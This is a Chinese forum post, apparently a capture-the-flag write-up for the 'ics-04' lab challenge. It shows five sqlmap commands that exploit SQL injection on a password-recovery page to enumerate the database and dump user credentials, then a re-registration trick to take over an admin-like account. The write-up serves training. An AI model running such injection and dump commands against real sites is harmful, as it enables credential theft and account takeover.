• 售前

  • 售后

热门帖子
入门百科

[wp] 攻防天下 ics-04

[复制链接]
随遇而安428 显示全部楼层 发表于 2022-1-15 20:18:07 |阅读模式 打印 上一主题 下一主题
实验注册登岸账号

扫了下目次没发现什么,用sqlmap把每个页面跑已往,发如今找回暗码页面有注入
  1. <code>sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1"
  2. sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --dbs
  3. sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 --tables
  4. sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user --columns
  5. sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user -C username&password --dump
复制代码

被hash加密了,发现注册页面可以再次注册c3tlwDmIn23这个账号,乐成重置暗码,登入得到flag


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作